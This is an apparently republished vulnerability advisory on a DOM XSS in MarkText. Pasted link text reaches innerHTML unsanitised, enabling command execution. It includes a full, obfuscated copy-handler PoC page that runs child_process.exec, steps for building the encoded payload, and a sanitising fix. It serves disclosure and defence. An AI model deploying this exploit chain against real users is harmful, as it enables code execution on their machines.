[Vulnerability Alert] MarkText Remote Command Execution Vulnerability

Posted by admin, 2023-07-10 01:37:00

MarkText Remote Command Execution Vulnerability

Vulnerability overview:

MarkText has a DOM XSS vulnerability that allows arbitrary JavaScript to run in the context of the MarkText main window. It can be exploited when a user copies text from a malicious web page and pastes it into MarkText.

Vulnerability details:

When the user pastes, MarkText inspects the clipboard data and tries to convert HTML tags into their Markdown equivalents, then generates HTML again for the Markdown preview.

Specifically, when the user copies a link from a web page and pastes it into MarkText, <a> tags are handled by the following code in src/muya/lib/contentState/pasteCtrl.js:

    const links = Array.from(tempWrapper.querySelectorAll('a'))
    for (const link of links) {
      const href = link.getAttribute('href')
      const text = link.textContent   // [1]
      if (URL_REG.test(href) && href === text) {
        const title = await getPageTitle(href)
        if (title) {
          link.innerHTML = sanitize(title, PREVIEW_DOMPURIFY_CONFIG, true)
        } else {
          const span = document.createElement('span')   // [2]
          span.innerHTML = text   // [3]
          link.replaceWith(span)
        }
      }
    }

This code iterates over all <a> tags. For each tag, if its href attribute is identical to its textContent, MarkText tries to fetch the URL and extract a title from the response, which is then sanitized and assigned to innerHTML.

However, if no title is found, MarkText creates a <span> element at [2] and assigns the original <a> tag's textContent to innerHTML at [3] without any sanitization, which results in DOM-based XSS.

This should affect all platforms, since MarkText is built on Electron. Tested on:

  • MarkText 0.17.1 for Windows
  • MarkText 0.17.1 for Linux

Vulnerability PoC

An attacker can craft a malicious web page that uses the following code to trigger the bug:

    <script>
      document.addEventListener('copy', e => {
        e.preventDefault();
        let payload = '';
        if (navigator.platform === 'Win32') {
          payload = decodeURIComponent(atob('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'));
        } else {
          payload = decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1kdWIyMWxMV05oYkdOMWJHRjBiM0lnTFdVZ0owMWhjbXRVWlhoMElGSkRSU0JRYjBNbklpayUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltZHViMjFsTFdOaGJHTjFiR0YwYjNJZ0xXVWdKMDFoY210VVpYaDBJRkpEUlNCUWIwTW5JaWslM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='))
        }
        e.clipboardData.setData('text/html', payload + window.getSelection());
      })
    </script>

The base64-encoded part of the PoC decodes to the following:

require("child_process").exec("gnome-calculator -e 'MarkText RCE PoC'")

Full code

    <html>
    <head>
      <style>
        .markdown-body {
          box-sizing: border-box;
          min-width: 200px;
          max-width: 980px;
          margin: 0 auto;
          padding: 45px;
        }
        @media (max-width: 767px) {
          .markdown-body {
            padding: 15px;
          }
        }
      </style>
      <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/github-markdown-css/5.2.0/github-markdown.min.css">
    </head>
    <body>
    <div class="markdown-body">
      <h1>MarkText Copy-and-Paste RCE PoC</h1>
      <h3>Copy anything from this page and paste it into your MarkText :)</h3>
      <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Diam vulputate ut pharetra sit amet aliquam. Sapien faucibus et molestie ac feugiat sed lectus. Imperdiet massa tincidunt nunc pulvinar sapien et ligula ullamcorper malesuada. Bibendum arcu vitae elementum curabitur vitae nunc sed. Tincidunt nunc pulvinar sapien et ligula ullamcorper. Sagittis aliquam malesuada bibendum arcu vitae. Sagittis vitae et leo duis ut. Amet nulla facilisi morbi tempus iaculis urna id volutpat. Rhoncus dolor purus non enim praesent elementum facilisis leo. Iaculis eu non diam phasellus vestibulum lorem sed. Adipiscing enim eu turpis egestas pretium aenean pharetra. Cursus mattis molestie a iaculis at. Enim neque volutpat ac tincidunt vitae semper quis. Pellentesque eu tincidunt tortor aliquam. Arcu dictum varius duis at consectetur lorem donec massa sapien. Sodales neque sodales ut etiam sit amet. Lacus sed turpis tincidunt id. Vitae proin sagittis nisl rhoncus mattis rhoncus urna. Faucibus et molestie ac feugiat.</p>
      <p>Fames ac turpis egestas maecenas pharetra convallis posuere morbi leo. Faucibus vitae aliquet nec ullamcorper sit amet risus nullam eget. Odio euismod lacinia at quis risus sed vulputate odio. Pulvinar etiam non quam lacus suspendisse. In cursus turpis massa tincidunt dui ut ornare. Nunc vel risus commodo viverra maecenas. Metus aliquam eleifend mi in nulla posuere sollicitudin aliquam. Elementum pulvinar etiam non quam. Pellentesque nec nam aliquam sem et tortor consequat id porta. Integer feugiat scelerisque varius morbi enim nunc faucibus. Pellentesque dignissim enim sit amet venenatis.</p>
      <p>Gravida neque convallis a cras semper auctor neque. Dictum at tempor commodo ullamcorper a lacus vestibulum. Eu turpis egestas pretium aenean pharetra. Euismod elementum nisi quis eleifend. Vitae proin sagittis nisl rhoncus mattis rhoncus urna neque viverra. Volutpat consequat mauris nunc congue nisi. Risus quis varius quam quisque id diam vel quam. Dictum non consectetur a erat. Faucibus purus in massa tempor nec feugiat. Quam elementum pulvinar etiam non quam lacus suspendisse faucibus interdum. In egestas erat imperdiet sed euismod nisi porta. Id faucibus nisl tincidunt eget.</p>
      <p>Vulputate sapien nec sagittis aliquam malesuada bibendum arcu vitae elementum. Aliquam eleifend mi in nulla posuere. Cursus sit amet dictum sit amet justo donec. Vitae et leo duis ut diam quam nulla porttitor massa. Eu consequat ac felis donec et odio pellentesque diam. Amet nisl purus in mollis. Vitae purus faucibus ornare suspendisse sed. Tincidunt tortor aliquam nulla facilisi cras fermentum odio. Massa eget egestas purus viverra accumsan. Pellentesque dignissim enim sit amet venenatis urna cursus. Eget magna fermentum iaculis eu.</p>
      <p>Ornare massa eget egestas purus viverra accumsan. Orci porta non pulvinar neque laoreet suspendisse interdum consectetur libero. Morbi tristique senectus et netus et malesuada. Aliquet risus feugiat in ante. Risus pretium quam vulputate dignissim suspendisse. Vestibulum lectus mauris ultrices eros in cursus turpis massa tincidunt. Vel elit scelerisque mauris pellentesque pulvinar pellentesque. Auctor eu augue ut lectus arcu bibendum at. Aliquet risus feugiat in ante metus dictum at tempor commodo. Integer feugiat scelerisque varius morbi enim nunc faucibus a pellentesque. Venenatis tellus in metus vulputate eu. Eget est lorem ipsum dolor sit amet. Congue eu consequat ac felis donec et odio pellentesque. Pellentesque sit amet porttitor eget. Dictum non consectetur a erat. Justo laoreet sit amet cursus sit amet dictum sit amet. Magna fermentum iaculis eu non diam.</p>
      <p>Donec ultrices tincidunt arcu non sodales. Et magnis dis parturient montes nascetur ridiculus. Eros in cursus turpis massa tincidunt. Leo vel fringilla est ullamcorper eget nulla facilisi etiam dignissim. Sodales neque sodales ut etiam sit amet nisl purus. Molestie at elementum eu facilisis sed odio. Viverra orci sagittis eu volutpat odio facilisis mauris sit amet. Consequat id porta nibh venenatis cras sed felis. Tellus elementum sagittis vitae et leo duis ut. Maecenas ultricies mi eget mauris pharetra et. Mi sit amet mauris commodo quis imperdiet. Gravida quis blandit turpis cursus in. Enim nec dui nunc mattis enim ut tellus elementum. Eu augue ut lectus arcu bibendum at. A cras semper auctor neque vitae tempus. Duis at tellus at urna. At lectus urna duis convallis convallis tellus id interdum. Enim facilisis gravida neque convallis a cras semper auctor neque. Sed adipiscing diam donec adipiscing tristique risus nec feugiat in.</p>
      <p>Volutpat lacus laoreet non curabitur gravida arcu ac. Diam quis enim lobortis scelerisque fermentum dui faucibus. Tristique nulla aliquet enim tortor at auctor urna nunc id. Sit amet facilisis magna etiam. Proin gravida hendrerit lectus a. Fames ac turpis egestas maecenas. Ut eu sem integer vitae. Nunc aliquet bibendum enim facilisis gravida neque convallis a. Vulputate sapien nec sagittis aliquam. Egestas integer eget aliquet nibh. Rutrum quisque non tellus orci ac auctor augue. Sed blandit libero volutpat sed cras. Suspendisse potenti nullam ac tortor vitae purus faucibus ornare suspendisse. Dolor sed viverra ipsum nunc aliquet bibendum enim facilisis. Nullam eget felis eget nunc lobortis.</p>
    </div>
    <script>
      document.addEventListener('copy', e => {
        e.preventDefault();
        // p = btoa(`require("child_process").exec("gnome-calculator -e 'MarkText RCE PoC'")`);
        // btoa(encodeURIComponent(`[‪](<a href="http://1:1/#&#x3c;svg&#x3e;&#x3c;svg&#x20;onload=eval(atob('${p}'))&#x3e;">http://1:1/#&#x3c;svg&#x3e;&#x3c;svg&#x20;onload=eval(atob('${p}'))&#x3e;</a>)`))
        let payload = '';
        if (navigator.platform === 'Win32') {
          payload = decodeURIComponent(atob('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'));
        } else {
          payload = decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1kdWIyMWxMV05oYkdOMWJHRjBiM0lnTFdVZ0owMWhjbXRVWlhoMElGSkRSU0JRYjBNbklpayUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltZHViMjFsTFdOaGJHTjFiR0YwYjNJZ0xXVWdKMDFoY210VVpYaDBJRkpEUlNCUWIwTW5JaWslM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='))
        }
        e.clipboardData.setData('text/html', payload + window.getSelection());
      })
    </script>
    </body>
    </html>

When the victim copies text from this page, the payload is appended to the copied content and fires when the text is pasted into MarkText. The PoC runs a system command on Windows or Linux (gnome-calculator in the Linux case).

Below are GIFs demonstrating the PoC on Windows and Ubuntu:

[GIFs: PoC demonstration on Windows and Ubuntu; images not preserved]

Online PoC address

https://o.cal1.cn/c3a8d0cbeea8f9ab-marktext-poc/rce.html

Constructing the PoC

Original PoC

require("child_process").exec("calc")

base64-encoded

cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNhbGMiKQ==

URL-encoded (wrapped in the link markup)

%5B%E2%80%AA%5D(%3Ca%20href%3D%22http%3A%2F%2F1%3A1%2F%23%26%23x3c%3Bsvg%26%23x3e%3B%26%23x3c%3Bsvg%26%23x20%3Bonload%3Deval(atob('cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNhbGMiKQ%3D%3D'))%26%23x3e%3B%22%3Ehttp%3A%2F%2F1%3A1%2F%23%26%23x3c%3Bsvg%26%23x3e%3B%26%23x3c%3Bsvg%26%23x20%3Bonload%3Deval(atob('cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNhbGMiKQ%3D%3D'))%26%23x3e%3B%3C%2Fa%3E)

base64-encoded again

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

Final PoC

    <script>
      document.addEventListener('copy', e => {
        e.preventDefault();
        // p = btoa(`require("child_process").exec("gnome-calculator -e 'MarkText RCE PoC'")`);
        // btoa(encodeURIComponent(`[‪](<a href="http://1:1/#&#x3c;svg&#x3e;&#x3c;svg&#x20;onload=eval(atob('${p}'))&#x3e;">http://1:1/#&#x3c;svg&#x3e;&#x3c;svg&#x20;onload=eval(atob('${p}'))&#x3e;</a>)`))
        let payload = '';
        if (navigator.platform === 'Win32') {
          payload = decodeURIComponent(atob('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'));
        } else {
          payload = decodeURIComponent(atob('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'))
        }
        e.clipboardData.setData('text/html', payload + window.getSelection());
      })
    </script>

Execution result

[Screenshot: PoC execution result; image not preserved]

0day

Tested: the latest release on the official website is still affected by this vulnerability.

[Screenshots: latest release still affected; images not preserved]

Mitigation:

It is recommended to sanitize untrusted data before assigning it to innerHTML.
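To show the root cause at [2]/[3] and the recommended fix side by side, the following is an added example that is not MarkText's code: it models the fallback branch without a browser, assuming a small entity decoder and escaper stand in for the DOM parser, and uses a constructed clipboard fragment in the shape the PoC relies on (href and visible text identical, tags entity-encoded).

```javascript
// Added example, not MarkText's code: models the pasteCtrl.js fallback
// branch ([2]/[3]) without a browser. Assumptions: the tiny entity decoder
// and escaper stand in for the DOM parser; SAMPLE is constructed.

// A browser decodes entities when it computes textContent from pasted HTML.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"').replace(/&amp;/g, '&');
}

// Escape text so that, if it is later treated as markup, no element or
// attribute can be introduced (what a textContent assignment does for free).
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// href and textContent of the first <a> in a pasted fragment.
function parseAnchor(html) {
  const m = /<a\s+href="([^"]*)">([\s\S]*?)<\/a>/i.exec(html);
  return m ? { href: decodeEntities(m[1]), text: decodeEntities(m[2]) } : null;
}

// Vulnerable fallback: the decoded text is re-parsed as HTML (innerHTML).
function fallbackSpanVulnerable(link) {
  return '<span>' + link.text + '</span>';
}

// Fixed fallback: the text stays text (textContent, or escaped innerHTML).
function fallbackSpanFixed(link) {
  return '<span>' + escapeHtml(link.text) + '</span>';
}

// True if the result contains any tag other than the wrapper <span>.
function introducesMarkup(spanHtml) {
  return /<(?!\/?span\b)[a-z]/i.test(spanHtml);
}

// Constructed clipboard fragment in the shape the advisory describes:
// href and visible text are identical and carry entity-encoded tags.
const SAMPLE = '<a href="http://1:1/#&#x3c;svg&#x20;onload=x&#x3e;">' +
               'http://1:1/#&#x3c;svg&#x20;onload=x&#x3e;</a>';
const link = parseAnchor(SAMPLE);
console.log(link.href === link.text);                        // true: takes the href === text branch
console.log(introducesMarkup(fallbackSpanVulnerable(link)));  // true: an <svg> element is re-created
console.log(introducesMarkup(fallbackSpanFixed(link)));       // false
```

The check that matters is the last two lines: the same decoded string yields a new element under the vulnerable path and plain text under the fixed one.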

End users running an affected version are advised not to copy text from untrusted web pages and paste it into MarkText.


Originally published on the WeChat public account 利刃信安攻防实验室: [Vulnerability Alert] MarkText Remote Command Execution Vulnerability

Article link (CN-SEC): http://cn-sec.com/archives/1863840.html